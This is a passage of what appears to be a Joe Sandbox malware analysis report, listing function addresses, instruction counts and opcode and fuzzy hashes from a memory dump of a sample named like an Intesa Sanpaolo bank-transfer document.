                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 6678bf9c59e18e38ded10e4dbf657d914ba17ca1d1c6316ce162964854b14f67
                                  • Instruction ID: e1339d89489e69a7fc8dc2c48ec6d6108c01e7209805705029c3f6b6bee818bc
                                  • Opcode Fuzzy Hash: 6678bf9c59e18e38ded10e4dbf657d914ba17ca1d1c6316ce162964854b14f67
                                  • Instruction Fuzzy Hash: 6CD1EF71E0060ACFDF4DCF6AC841AFEB7F5AF88304F198169D965A7281E735E9058B60
                                  Function 010C65D0 Relevance: .4, Instructions: 383COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: a40d9dae3359158a78e67a0e548fc1b5d432019aa0f94b9ff39037232bd339ec
                                  • Instruction ID: 4e4fcbe505c9d4a8a7a07bc341419cf22527eb4198a0fae6efeadee6a9e6272d
                                  • Opcode Fuzzy Hash: a40d9dae3359158a78e67a0e548fc1b5d432019aa0f94b9ff39037232bd339ec
                                  • Instruction Fuzzy Hash: 03E16C715083429FC725CF28C490A6EBBE0FF89714F158A6DE99987351EB32E905CF92
                                  Function 010B8397 Relevance: .4, Instructions: 380COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: ea0e908780d566193bab6175bab2373b2fe7d6565c9bee222379335e58c52749
                                  • Instruction ID: 38ad58b5256610fa62c6d2c72bd69f9a02bb96dc422bd23e3cd384352e797c18
                                  • Opcode Fuzzy Hash: ea0e908780d566193bab6175bab2373b2fe7d6565c9bee222379335e58c52749
                                  • Instruction Fuzzy Hash: DCD1E471A002069BDB18DF69C8C0AFEB7F9BF54308F04852EE955DB2A4EB34D955CB50
                                  Function 01148243 Relevance: .3, Instructions: 322COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
                                  • Instruction ID: e7eb66a617c309dc1fdf2587c1d31dbfd9df6af99d578751efc2a238d56d9b26
                                  • Opcode Fuzzy Hash: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
                                  • Instruction Fuzzy Hash: CDB15374A00605AFDB68DFD9C940EEBBBB9FF84B04F14446DAA4297790DB34E906CB10
                                  Function 010D0535 Relevance: .3, Instructions: 300COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
                                  • Instruction ID: b45d93123d6653b894515795e6d482afe0730e4a673d77a7e20dd12e960f137a
                                  • Opcode Fuzzy Hash: c61ad9210afadd02b75b489723f8fea184d45ce3a0816f7da46b339e1a5f1bc9
                                  • Instruction Fuzzy Hash: 91B10531600756AFDB19DB68C890BBFBBF6AF84300F150199E6969B385D734E941CB90
                                  Function 010C83C0 Relevance: .3, Instructions: 281COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 4309142b5f8a69867dfddfa9f7a85cba8ee16e70577da02d817ad6b42ddc2a83
                                  • Instruction ID: 2dc41bc75b561d39ff04b487ab7af25bc02d377d674d8a6822ff7467ad24d794
                                  • Opcode Fuzzy Hash: 4309142b5f8a69867dfddfa9f7a85cba8ee16e70577da02d817ad6b42ddc2a83
                                  • Instruction Fuzzy Hash: B1C156742083419FD764CF19C494BAFB7E4BF98704F44896EE98987291D7B4E908CF92
                                  Function 010BC427 Relevance: .3, Instructions: 280COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: b7a2a175f367601811d16961adced5dd8b52310387b1a7a976ad40516f16152b
                                  • Instruction ID: c53d5fc875ac65c5957777ff29c8a28ed864164e6d3a189a0eb1b88b7758409c
                                  • Opcode Fuzzy Hash: b7a2a175f367601811d16961adced5dd8b52310387b1a7a976ad40516f16152b
                                  • Instruction Fuzzy Hash: 97B18270A002668BEB65CF58C990BEDB7F5EF44704F0485EAD58AE7281EB709DC5CB21
                                  Function 010EE5E7 Relevance: .3, Instructions: 278COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: d4d2face619de80676b10406432170cc9b321ca20ff5e3ac3bcaca57a6d0cea8
                                  • Instruction ID: d5f086871d93cba70ada871201e7f9ed0636e291425835ec1a0f4e0c96751468
                                  • Opcode Fuzzy Hash: d4d2face619de80676b10406432170cc9b321ca20ff5e3ac3bcaca57a6d0cea8
                                  • Instruction Fuzzy Hash: B0A14531E0062A9FEB2ADB59C848FAEBBF4FB04754F050161EA90AB2D0D7749D51CBD1
                                  Function 01100185 Relevance: .3, Instructions: 276COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 242ab977b471e23cc69b6adc4b9c81176b1fbbb0f11e2f1dddd6daf024bd05c7
                                  • Instruction ID: 4888dc9bea8135307e9f5c6b455e99309ee14bef968abb898589ed03ce7bc9ea
                                  • Opcode Fuzzy Hash: 242ab977b471e23cc69b6adc4b9c81176b1fbbb0f11e2f1dddd6daf024bd05c7
                                  • Instruction Fuzzy Hash: 51A1C070F0161A9FDB2EDF69C990BAAB7A1FF48358F014029EA45D72C1DBB4E815CB40
                                  Function 01194500 Relevance: .3, Instructions: 275COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 254cf8d355fbdf2a1a72c25b075ca7c13c15522a44506cabef862e08f50c258d
                                  • Instruction ID: c64e8209d65ddf529947a66fd636534335f467ef9f75665f992f32f015490613
                                  • Opcode Fuzzy Hash: 254cf8d355fbdf2a1a72c25b075ca7c13c15522a44506cabef862e08f50c258d
                                  • Instruction Fuzzy Hash: 2DA1D072A14612DFDB29DF58CA80B5AB7E9FF58704F050528F5A5DBA50C334EC42CB92
                                  Function 011460E0 Relevance: .3, Instructions: 264COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: cd943dd76ee5928dab279a5aadc6047473026ba7a1d75d28cf886d6fed2182a0
                                  • Instruction ID: a42cfa15e71f5ce8571074c5ad89e917275e5906d79dc6b62551e2bc499929c1
                                  • Opcode Fuzzy Hash: cd943dd76ee5928dab279a5aadc6047473026ba7a1d75d28cf886d6fed2182a0
                                  • Instruction Fuzzy Hash: 7391C471E04216AFDF19CFA8D894BAEBFB5AF4AB14F154169E614EB340D734D900CBA0
                                  Function 010DE3F0 Relevance: .3, Instructions: 261COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 75d31e43592a13e792a637e2572a24410b182a225f028bdec125c50908ab749f
                                  • Instruction ID: fd96bd2fec8d34e0ecd02eef350f0cb6df179d613694fd144f45a7ce97648433
                                  • Opcode Fuzzy Hash: 75d31e43592a13e792a637e2572a24410b182a225f028bdec125c50908ab749f
                                  • Instruction Fuzzy Hash: 76911532A0072ACBEB28DB5DC480BBE7BA1EF94758F054169E9859F284FB34DD41CB51
                                  Function 01116ACC Relevance: .2, Instructions: 226COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: b2cf58391bb3296f224667a5e2c062c76544530dc5d9f5547a199d3517bef88e
                                  • Instruction ID: d629e23cc64e27d53bdac26cd6e51290cb729a69df65a258fd9e02f6a5c3d851
                                  • Opcode Fuzzy Hash: b2cf58391bb3296f224667a5e2c062c76544530dc5d9f5547a199d3517bef88e
                                  • Instruction Fuzzy Hash: 3F818071A0061A9BDB18CF69C890ABEFBF9FB48700F04853EE445E7644E775D940CBA4
                                  Function 0118AB40 Relevance: .2, Instructions: 222COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: e20f57e4ff007d65908e0e6f7ea2c5d260c397918ed067619b1479e5480266a4
                                  • Instruction ID: 10d9f50a63a619b633fcce28ac6d58aea7ce1fc74b35558e9f9a55ab4477cf62
                                  • Opcode Fuzzy Hash: e20f57e4ff007d65908e0e6f7ea2c5d260c397918ed067619b1479e5480266a4
                                  • Instruction Fuzzy Hash: F6817E71A002099FDF1DDF98D890AAEBBB6BF84310F19C56AD9169B384D774E902CF50
                                  Function 010B6D10 Relevance: .2, Instructions: 216COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: ff29f473bd506b09874c170821274a614915654dda65aa0eb250644589bdb6b3
                                  • Instruction ID: 8e472d2edff610e9261b3a0be93d46b891ab863e7e752f2ae1707e64d5e35fcd
                                  • Opcode Fuzzy Hash: ff29f473bd506b09874c170821274a614915654dda65aa0eb250644589bdb6b3
                                  • Instruction Fuzzy Hash: EE71B371A0470A9BEB2DCF19C8A0B6EF7E4BB44358F054939E9A5C7204E730E944CB92
                                  Function 010FE284 Relevance: .2, Instructions: 212COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 6476698fed79cefb59827125c7c5bffd2259a5198c6a6ddee1980e748330b497
                                  • Instruction ID: be3bb92d476ea1ba8dd9d629d226af213469963ef3a84409e62ac27f12053f3b
                                  • Opcode Fuzzy Hash: 6476698fed79cefb59827125c7c5bffd2259a5198c6a6ddee1980e748330b497
                                  • Instruction Fuzzy Hash: 47818F71A00609AFDB25CFA9C884BEEBBF9FF88314F11842DE695A7650D770AC45CB50
                                  Function 010DC640 Relevance: .2, Instructions: 206COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 00d3090be62a3290ec929ee89c3361074395da524fd5bf422dd5514760fce9f2
                                  • Instruction ID: eb23cb548d03bddac4250aeabb6f82c57025d8e897a2b3edae7cef36ed805bc1
                                  • Opcode Fuzzy Hash: 00d3090be62a3290ec929ee89c3361074395da524fd5bf422dd5514760fce9f2
                                  • Instruction Fuzzy Hash: AA71DA75C002299FDB298F58D9907BEBBF0FF58710F15412AE992AB350E7309854CBA0
                                  Function 01158D6B Relevance: .2, Instructions: 206COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: ccbbb3d0b8a283bac20bc60b0af3c1117fd94c77cdd10a606f20c5fa6b6241b6
                                  • Instruction ID: 5bcc1ecea56bf4c49b668ca9913abaa13b67b58e98aed63a2a06c9161b866124
                                  • Opcode Fuzzy Hash: ccbbb3d0b8a283bac20bc60b0af3c1117fd94c77cdd10a606f20c5fa6b6241b6
                                  • Instruction Fuzzy Hash: 9071BF70904266DFCB59DF5AC840ABABBF1EF89304F048069EDA4DB241E335EA45C7A1
                                  Function 0114035C Relevance: .2, Instructions: 198COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: f01f26b9d4523bb8af8d0dc1087c2bf1dc413617a4b2b84ce5c3b8fc37ed168b
                                  • Instruction ID: e69c4ed0a3f04f38747073b7aafdfb0a118f32ed7eb82d382954aa9aabc8ae11
                                  • Opcode Fuzzy Hash: f01f26b9d4523bb8af8d0dc1087c2bf1dc413617a4b2b84ce5c3b8fc37ed168b
                                  • Instruction Fuzzy Hash: 48717D71E0060AAFDB14DFA9C984EDEBBB8FF48704F104569E645AB250DB30EA41CB90
                                  Function 011562A0 Relevance: .2, Instructions: 198COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 30448ab7032c096a65e2d3f2372f1fa5200a0c385bd5ab77daf502410b72dc46
                                  • Instruction ID: ffaf9ce4a43dcd9eb0b81667a84ed99c9d95a02baed6557fecd04ef0a6e381c0
                                  • Opcode Fuzzy Hash: 30448ab7032c096a65e2d3f2372f1fa5200a0c385bd5ab77daf502410b72dc46
                                  • Instruction Fuzzy Hash: FB71F232200B01EFE77A9F18C844F5ABBB6EF44724F554528EA658B2E1D774E944CB90
                                  Function 010C8AA0 Relevance: .2, Instructions: 197COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 8f86701b782643bc4a46baa086ab4d7e498e321f2ef890256876ad1fa4b52a79
                                  • Instruction ID: 03d756881e53b8a67aff7243f01952d4ed611a7fa9e24e165c4729ed0c9bf159
                                  • Opcode Fuzzy Hash: 8f86701b782643bc4a46baa086ab4d7e498e321f2ef890256876ad1fa4b52a79
                                  • Instruction Fuzzy Hash: FE81BD72A083268FDB28CF9CC4C4BAEB7B1BB49710F15812ED901AB282C7759D50CF94
                                  Function 010FCDB1 Relevance: .2, Instructions: 197COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: ec0338e1e4ed9da99b4b08ff3da61e3bdbb89838f463a0515db81102eda49c81
                                  • Instruction ID: 6ecce2a88fd3306672e8de36dbe70a96f44d2138d829c4186640a036998a085b
                                  • Opcode Fuzzy Hash: ec0338e1e4ed9da99b4b08ff3da61e3bdbb89838f463a0515db81102eda49c81
                                  • Instruction Fuzzy Hash: 1361C071A0020ADFDB1DDF68C982AAEB7B5FF48314F14466DE652EB295DB309902CF50
                                  Function 010EEDD3 Relevance: .2, Instructions: 166COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: cc0a7c2461ced63e7afd9ab7dfce9f01ca23f4a89521841a9e5173d2dc867562
                                  • Instruction ID: 1c454bb3357d623e9c8a4b1a1066e2c29a9f1014cad3047f5a75fa0a310933e8
                                  • Opcode Fuzzy Hash: cc0a7c2461ced63e7afd9ab7dfce9f01ca23f4a89521841a9e5173d2dc867562
                                  • Instruction Fuzzy Hash: 7651CD7120075ADFDB25DB5AC888B6BB7F9BF54709F10092DE18287A52D774E885CB80
                                  Function 01188DAE Relevance: .2, Instructions: 162COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 0578ae52b40fe5b75519501fe2eed2ff72f621034b6a11d64400c9e5fe5692a6
                                  • Instruction ID: 08c3e8f9f8634b75046041a6206d5e48504b98457e6477717728a815c91adc0f
                                  • Opcode Fuzzy Hash: 0578ae52b40fe5b75519501fe2eed2ff72f621034b6a11d64400c9e5fe5692a6
                                  • Instruction Fuzzy Hash: 2651D1726047129FD72AEF28C840BAAB7E5FF94354F44892CF98597290D734E908CF96
                                  Function 01168350 Relevance: .2, Instructions: 161COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 88379f8c6bd6dd1ef2e7a498fb9a2f1f20dd9b07d3e6a651ba80acfc737be858
                                  • Instruction ID: 988c4e07fb7945aab7cc9a67e08d1e8b855f072086a31618747dcd319ff2e494
                                  • Opcode Fuzzy Hash: 88379f8c6bd6dd1ef2e7a498fb9a2f1f20dd9b07d3e6a651ba80acfc737be858
                                  • Instruction Fuzzy Hash: 4C51BD709007059BD729DF5AC884BABFBFCBF54714F10461EE292976A0C7B1A945CB50
                                  Function 010FE443 Relevance: .2, Instructions: 158COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: c665b33c5af86ddc39b2f0b167984d6aabf40b5afe7a8a71fb3f505786e7cfbd
                                  • Instruction ID: b5b6925c82f490b04bdfcc0c9bca624a5fb798f5b1008156286152fa17f764ca
                                  • Opcode Fuzzy Hash: c665b33c5af86ddc39b2f0b167984d6aabf40b5afe7a8a71fb3f505786e7cfbd
                                  • Instruction Fuzzy Hash: 0851ABB1200A09DFCB26EF69C984EAAB3F9FF54784F41046DE68297660DB34F940CB51
                                  Function 01164180 Relevance: .2, Instructions: 156COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: d8ad83ab42ea9293f83c5ffa220c3933931a81831006ed11825ae3ead3dc16bd
                                  • Instruction ID: 142e75514e6e78a016225a19864309741188269e3f8a75fcb970c75fd6bc81ed
                                  • Opcode Fuzzy Hash: d8ad83ab42ea9293f83c5ffa220c3933931a81831006ed11825ae3ead3dc16bd
                                  • Instruction Fuzzy Hash: A15188716083528FD758DF29C880A6BBBE9FFC8208F444A2DF589C7650EB31D915CB92
                                  Function 010E45B1 Relevance: .2, Instructions: 156COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 0d00e1a585e90d849ff2aa0c284c489e35fe4af6d50ef2092e2439a8439fa3dd
                                  • Instruction ID: 05311d9b674ba080ef332b102f7794d1443fb61fe96cc8f3fe5d47af1a5fe1b1
                                  • Opcode Fuzzy Hash: 0d00e1a585e90d849ff2aa0c284c489e35fe4af6d50ef2092e2439a8439fa3dd
                                  • Instruction Fuzzy Hash: 38519B75E0021AAFDB15DF99C844BEEBBF5BF49354F04406AEA81EB240D734D944CBA4
                                  Function 0114E9E0 Relevance: .2, Instructions: 154COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID: InitializeThunk
                                  • String ID:
                                  • API String ID: 2994545307-0
                                  • Opcode ID: b631fe1f52208cb18c131e5291272d5615ec6cd8030edbb8dd5fe07777775a1e
                                  • Instruction ID: 5f05f45d041e6084ac5ec149666cd299b14aa94b7d6f011a1cebf5e0a58d5d3f
                                  • Opcode Fuzzy Hash: b631fe1f52208cb18c131e5291272d5615ec6cd8030edbb8dd5fe07777775a1e
                                  • Instruction Fuzzy Hash: 1F51F931D0120AEFEF29DF94C884FAEBB74BF00B68F154665D91267290D7789E40CBA1
                                  Function 01188B28 Relevance: .2, Instructions: 152COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: ccdee65101088ffe3b6b7a3d6281dc2e5e082da281bcc7a71cf11a0143c27b14
                                  • Instruction ID: 429de37e9c51367d77e23d7e1602417aedc19a85a8c7c2b4ed5d7ecf9a30142e
                                  • Opcode Fuzzy Hash: ccdee65101088ffe3b6b7a3d6281dc2e5e082da281bcc7a71cf11a0143c27b14
                                  • Instruction Fuzzy Hash: 9141C3707056119BE72DFB2DC994BBBBB9AEFD0260F44C219F95587284DB34D801CE91
                                  Function 0114CBF0 Relevance: .1, Instructions: 148COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: 3c588322f48c75c687c5b245992921875a7cc65ea4e4881b431c4b8905d75d7f
                                  • Instruction ID: 30379a3ffac0f0417dbee05236f2a2c4e7670fc5e3c357c0aeb51ed2fdcd74a0
                                  • Opcode Fuzzy Hash: 3c588322f48c75c687c5b245992921875a7cc65ea4e4881b431c4b8905d75d7f
                                  • Instruction Fuzzy Hash: A551A075A0121ADFCB28DFA9C8C0A9EBBB9FF58B54B114529D595A3304D730AD41CFD0
                                  Function 010FA430 Relevance: .1, Instructions: 139COMMON
                                  Download Yara Rule
                                  Memory Dump Source
                                  • Source File: 00000006.00000002.1421415028.0000000001090000.00000040.00001000.00020000.00000000.sdmp, Offset: 01090000, based on PE: true
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_6_2_1090000_Documento di bonifico bancario intesa Sanpaola 20240613 EUR23750.jbxd
                                  Similarity
                                  • API ID:
                                  • String ID:
                                  • API String ID:
                                  • Opcode ID: b34013bd18d1835c6411e241982459dbe4d2b361923e5c95866ee8e4aca75841
                                  • Instruction ID: a71ab840e8c8274a52da0b4451e5d2436052dfea7a9ad1455e34dfec96467c56
